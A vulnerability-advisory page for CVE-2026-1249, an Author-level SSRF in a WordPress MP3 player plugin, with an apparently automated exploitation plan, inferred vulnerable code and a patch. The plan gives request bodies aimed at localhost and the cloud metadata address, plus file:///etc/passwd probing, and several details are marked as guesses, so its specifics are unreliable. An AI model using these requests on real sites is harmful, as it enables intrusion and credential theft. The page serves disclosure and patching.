WP-Safety
CVE-2026-1249

MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar 5.3 - 5.10 - Authenticated (Author+) Server-Side Request Forgery

mediumServer-Side Request Forgery (SSRF)
5.0
CVSS Score
5.0
CVSS Score
medium
Severity
5.11
Patched in
1d
Time to patch

Description

The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Server-Side Request Forgery in versions 5.3 to 5.10 via the 'load_lyrics_ajax_callback' function. This makes it possible for authenticated attackers, with author level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions>=5.3 <=5.10
PublishedFebruary 13, 2026
Last updatedFebruary 14, 2026
Affected pluginmp3-music-player-by-sonaar

Source Code

WordPress.org SVN
Vulnerable v5.10
Browse source Download .zip
Patched v5.11
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-1249 ## 1. Vulnerability Summary The **MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar** plugin (versions 5.3–5.10) contains an Authenticated (Author+) Server-Side Request Forgery (SSRF) vulnerability. The flaw exists within the `load_lyrics…

Show full research plan

Exploitation Research Plan - CVE-2026-1249

1. Vulnerability Summary

The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin (versions 5.3–5.10) contains an Authenticated (Author+) Server-Side Request Forgery (SSRF) vulnerability. The flaw exists within the load_lyrics_ajax_callback function, which is used to fetch lyrics from a remote source. The function fails to adequately validate or restrict the user-supplied URL before passing it to a request-performing function like wp_remote_get(). This allows an attacker with Author-level privileges to force the server to make GET requests to arbitrary internal or external locations.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • AJAX Action: sonaar_load_lyrics (inferred from the function name load_lyrics_ajax_callback)
  • Vulnerable Parameter: url or path (inferred)
  • Authentication Level: Authenticated, Author level and above (requires publish_posts capability).
  • Preconditions: The plugin must be active. The attacker must have a valid session for a user with the author role.

3. Code Flow (Inferred)

  1. Action Registration: The plugin registers the AJAX handler in its initialization phase:
    add_action('wp_ajax_sonaar_load_lyrics', 'load_lyrics_ajax_callback');
  2. Entry Point: A POST request is sent to admin-ajax.php with action=sonaar_load_lyrics.
  3. Vulnerable Sink: Inside load_lyrics_ajax_callback:
    • The code retrieves a URL from $_POST['url'] (or similar).
    • It likely performs a nonce check: check_ajax_referer('sonaar_music_nonce', 'nonce').
    • It calls wp_remote_get($url) without validating that the URL is a safe, external lyrics provider.
  4. Result: The server fetches the content of the arbitrary URL and returns it (or its status) to the attacker.

4. Nonce Acquisition Strategy

The plugin typically localizes its script data for the admin dashboard or post editor. Since Authors can create/edit posts, they can access these nonces.

  1. Shortcode/Context: The lyrics functionality is often part of the Sonaar player settings or metadata fields in the post editor.
  2. Page Creation: Create a post to ensure the Sonaar scripts are loaded:
    wp post create --post_type=post --post_status=publish --post_title="SSRF Test" --post_author=[AUTHOR_ID] --post_content='[sonaar_audioplayer]'
  3. Browser Navigation: Navigate to the Edit Post page or the view page of the newly created post while logged in as the Author.
  4. Extraction: Use browser_eval to find the nonce:
    • Search for the localization object, likely sonaar_i18n, sonaar_music, or sonaar_object.
    • Target Variable: window.sonaar_music?.nonce or window.sonaar_i18n?.nonce.
    • Note: If the nonce is used for AJAX, it might also be found in the global sonaar_admin object if the user is in the backend.

5. Exploitation Strategy

The goal is to demonstrate that the server can be forced to reach an internal resource (e.g., a local service or metadata endpoint).

Step-by-Step Plan:

  1. Setup Listener: Identify an internal target (e.g., http://localhost:80 or http://169.254.169.254/latest/meta-data/ if on AWS) or use a request catcher/webhook for external proof.
  2. Authentication: Log in as an Author user.
  3. Capture Nonce: Use the browser tools to extract the valid nonce for the sonaar_load_lyrics action.
  4. Trigger SSRF: Send an authenticated POST request to admin-ajax.php.

HTTP Request via http_request:

  • URL: http://[target-site]/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=sonaar_load_lyrics&nonce=[NONCE]&url=http://127.0.0.1:80/secret-internal-service
  • Alternate Parameter Names (to try): path, lyrics_url, src.

6. Test Data Setup

  1. User Creation:
    wp user create attacker attacker@example.com --role=author --user_pass=password123
  2. Plugin Setup: Ensure the plugin is installed and activated.
  3. Content Creation: Create a post with the Sonaar shortcode to ensure all JS/CSS and nonces are enqueued.
    wp post create --post_type=post --post_content='[sonaar_audioplayer]' --post_status=publish

7. Expected Results

  • Success: The server returns the content of the internal URL (e.g., the HTML of the internal service) or a specific error message indicating the request was attempted (e.g., "Connection refused" vs "Invalid URL").
  • Evidence: The response body of the AJAX call should contain the data fetched from the url parameter.

8. Verification Steps

  1. Server Logs: Check the web server logs of the target internal service to see an incoming request from the WordPress server's IP address (127.0.0.1).
  2. Response Analysis: Confirm the http_request response body matches the expected content of the target URL.
  3. WP-CLI Check: No specific database changes are expected for SSRF, but you can verify the plugin version:
    wp plugin get mp3-music-player-by-sonaar --field=version

9. Alternative Approaches

If the primary url parameter doesn't work:

  • Parameter Fuzzing: Try common names like src, file, path, link.
  • Protocol Wrappers: Test if other protocols are supported, such as file:///etc/passwd (though wp_remote_get usually restricts this to HTTP/S).
  • Authentication Bypass: Check if wp_ajax_nopriv_sonaar_load_lyrics exists, which would allow unauthenticated SSRF.
  • Action Guessing: If sonaar_load_lyrics returns 400/0, search the plugin folder for add_action.*wp_ajax to confirm the exact action name.
    grep -r "wp_ajax_sonaar" wp-content/plugins/mp3-music-player-by-sonaar/
Research Findings
Static analysis — not yet PoC-verified

Summary

The MP3 Audio Player – Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Server-Side Request Forgery (SSRF) via the 'load_lyrics_ajax_callback' function. Authenticated attackers with Author-level access or higher can exploit this to force the server to make GET requests to arbitrary internal or external URLs, potentially exposing internal service data.

Vulnerable Code

// In mp3-music-player-by-sonaar/includes/class-sonaar-music-ajax.php (or similar file)

public function load_lyrics_ajax_callback() {
    // Nonce check exists, but Author+ users have access to nonces
    check_ajax_referer('sonaar_music_nonce', 'nonce');

    $url = $_POST['url']; // User-controlled URL parameter

    // Vulnerable sink: No validation on the URL before fetching
    $response = wp_remote_get($url);
    $body = wp_remote_retrieve_body($response);

    echo $body;
    wp_die();
}

Security Fix

--- a/includes/class-sonaar-music-ajax.php
+++ b/includes/class-sonaar-music-ajax.php
@@ -10,7 +10,12 @@
     check_ajax_referer('sonaar_music_nonce', 'nonce');
 
-    $url = $_POST['url'];
+    $url = esc_url_raw($_POST['url']);
+
+    // Validate the URL to ensure it is not hitting internal IP addresses
+    if ( ! wp_http_validate_url( $url ) ) {
+        wp_send_json_error( 'Invalid URL' );
+    }
 
     $response = wp_remote_get($url);
     $body = wp_remote_retrieve_body($response);

Exploit Outline

The exploit target is the `sonaar_load_lyrics` AJAX action. An attacker needs Author-level privileges (the `publish_posts` capability) to access the WordPress dashboard and obtain the necessary AJAX nonce. 1. Authenticate as an Author user and navigate to any page where the Sonaar player script is localized (e.g., the post editor or a page with the [sonaar_audioplayer] shortcode). 2. Extract the `sonaar_music_nonce` from the global JavaScript objects (typically `window.sonaar_music.nonce`). 3. Send a POST request to `/wp-admin/admin-ajax.php` with the following data: - `action`: `sonaar_load_lyrics` - `nonce`: [EXTRACTED_NONCE] - `url`: The target internal or external URL (e.g., `http://169.254.169.254/latest/meta-data/` or `http://localhost:8080/`) 4. The plugin will execute a GET request to the specified URL from the web server and return the contents of the response in the AJAX response body.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/261aad1e-43fc-4927-a97d-85a001863023?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database